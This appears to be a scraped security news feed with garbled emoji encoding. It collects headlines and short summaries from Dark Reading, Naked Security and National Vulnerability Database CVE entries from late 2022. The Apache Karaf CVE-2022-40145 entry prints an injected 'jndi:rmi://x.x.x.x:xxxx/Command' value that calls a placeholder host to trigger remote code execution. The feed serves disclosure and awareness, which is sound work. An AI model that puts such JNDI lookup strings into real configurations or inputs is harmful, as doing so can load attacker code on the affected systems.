π΄ How to Run Kubernetes More Securely π΄
π Read
via "Dark Reading".
The open source container tool is quite popular among developers β and threat actors. Here are a few ways DevOps teams can take control.π Read
via "Dark Reading".
Dark Reading
How to Run Kubernetes More Securely
The open source container tool is quite popular among developers β and threat actors. Here are a few ways DevOps teams can take control.
π΄ Godfather Banking Trojan Masquerades as Legitimate Google Play App π΄
π Read
via "Dark Reading".
The malware has resurfaced, using an icon and name similar to the legitimate Google Play app MYT Music, a popular app with more than 10 million downloads.π Read
via "Dark Reading".
Dark Reading
Godfather Banking Trojan Masquerades as Legitimate Google Play App
The malware has resurfaced, using an icon and name similar to the legitimate Google Play app MYT Music, a popular app with more than 10 million downloads.
π΄ Understanding the 3 Classes of Kubernetes Risk π΄
π Read
via "Dark Reading".
The first step toward securing Kubernetes environments is understanding the risks they pose and identifying the ways in which those risks can be mitigated.π Read
via "Dark Reading".
Dark Reading
Understanding the 3 Classes of Kubernetes Risk
The first step toward securing Kubernetes environments is understanding the risks they pose and identifying the ways in which those risks can be mitigated.
π1
π΄ Kaspersky Research Finds Reverse Engineering Is the Most On-Demand Skill Among InfoSec Specialists π΄
π Read
via "Dark Reading".
π Read
via "Dark Reading".
Dark Reading
Kaspersky Research Finds Reverse Engineering Is the Most On-Demand Skill Among InfoSec Specialists
Woburn, MA β December 21, 2022 β According toresults shown by the latest statistics from participantspassing Kaspersky Expert Training courses, the most desired skill IT security professionals wanted to advance in 2022 is the ability to reverse engineer malware.
βΌ CVE-2022-40145 βΌ
π Read
via "National Vulnerability Database".
This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8π Read
via "National Vulnerability Database".
π1
β Microsoft dishes the dirt on Appleβs βAchilles heelβ shortly after fixing similar Windows bug β
π Read
via "Naked Security".
It happens to the best of us: Microsoft highlights a security bypass bug on Macs that is curiously similar to a recent Windows 0-day.π Read
via "Naked Security".
Sophos News
Naked Security β Sophos News
π΄ Trend Micro Joins Googleβs App Defense Alliance π΄
π Read
via "Dark Reading".
Trend Micro will be joining Google's App Defense Alliance (ADA) to help improve their ability to identify malicious apps before they are published to the Google Play store.π Read
via "Dark Reading".
Dark Reading
Trend Micro Joins Googleβs App Defense Alliance
Trend Micro will be joining Google's App Defense Alliance (ADA) to help improve their ability to identify malicious apps before they are published to the Google Play store.
β βSuspicious loginβ scammers up their game β take care at Christmas β
π Read
via "Naked Security".
A picture is worth 1024 words - we clicked through so you don't have to.π Read
via "Naked Security".
Naked Security
βSuspicious loginβ scammers up their game β take care at Christmas
A picture is worth 1024 words β we clicked through so you donβt have to.
π΄ Name That Toon: Kiss and Tell π΄
π Read
via "Dark Reading".
Feeling creative? Submit your caption and our panel of experts will reward the winner with a $25 Amazon gift card.π Read
via "Dark Reading".
Dark Reading
Name That Toon: Kiss and Tell
Feeling creative? Submit your caption and our panel of experts will reward the winner with a $25 Amazon gift card.
βΌ CVE-2022-40841 βΌ
π Read
via "National Vulnerability Database".
A cross-site scripting (XSS) vulnerability in NdkAdvancedCustomizationFields v3.5.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payloads injected into the "htmlNodes" parameter.π Read
via "National Vulnerability Database".
βΌ CVE-2022-42454 βΌ
π Read
via "National Vulnerability Database".
Insights for Vulnerability Remediation (IVR) is vulnerable to man-in-the-middle attacks that may lead to information disclosure. This requires privileged network access.π Read
via "National Vulnerability Database".
βΌ CVE-2022-4287 βΌ
π Read
via "National Vulnerability Database".
Authentication bypass in local application lock feature in Devolutions Remote Desktop Manager 2022.3.26 and earlier on Windows allows malicious user to access the application.π Read
via "National Vulnerability Database".
βΌ CVE-2022-44756 βΌ
π Read
via "National Vulnerability Database".
Insights for Vulnerability Remediation (IVR) is vulnerable to improper input validation. This may lead to information disclosure. This requires privileged access.π Read
via "National Vulnerability Database".
βΌ CVE-2022-47581 βΌ
π Read
via "National Vulnerability Database".
Isode M-Vault 16.0v0 through 17.x before 17.0v24 can crash upon an LDAP v1 bind request.π Read
via "National Vulnerability Database".
βΌ CVE-2022-4630 βΌ
π Read
via "National Vulnerability Database".
Sensitive Cookie Without 'HttpOnly' Flag in GitHub repository lirantal/daloradius prior to master.π Read
via "National Vulnerability Database".
βΌ CVE-2022-38655 βΌ
π Read
via "National Vulnerability Database".
BigFix WebUI non-master operators are missing controls that prevent them from being able to modify the relevance of fixlets or to deploy fixlets from the BES Support external site.π Read
via "National Vulnerability Database".
π΄ Best Practices for Securing and Governing Your Multicloud Deployment π΄
π Read
via "Dark Reading".
Organizations can start by integrating functions like detection, prioritization, and remediation on to a single platform.π Read
via "Dark Reading".
Dark Reading
Best Practices for Securing and Governing Your Multicloud Deployment
Organizations can start by integrating functions like detection, prioritization, and remediation on to a single platform.
βΌ CVE-2020-36621 βΌ
π Read
via "National Vulnerability Database".
A vulnerability, which was classified as problematic, has been found in chedabob whatismyudid. Affected by this issue is the function exports.enrollment of the file routes/mobileconfig.js. The manipulation leads to cross site scripting. The attack may be launched remotely. The name of the patch is bb33d4325fba80e7ea68b79121dba025caf6f45f. It is recommended to apply a patch to fix this issue. VDB-216470 is the identifier assigned to this vulnerability.π Read
via "National Vulnerability Database".
βΌ CVE-2021-4271 βΌ
π Read
via "National Vulnerability Database".
A vulnerability was found in panicsteve w2wiki. It has been rated as problematic. Affected by this issue is the function toHTML of the file index.php of the component Markdown Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The name of the patch is 8f1d0470b4ddb1c7699e3308e765c11ed29542b6. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216476.π Read
via "National Vulnerability Database".
βΌ CVE-2020-36623 βΌ
π Read
via "National Vulnerability Database".
A vulnerability was found in Pengu. It has been declared as problematic. Affected by this vulnerability is the function runApp of the file src/index.js. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The name of the patch is aea66f12b8cdfc3c8c50ad6a9c89d8307e9d0a91. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216475.π Read
via "National Vulnerability Database".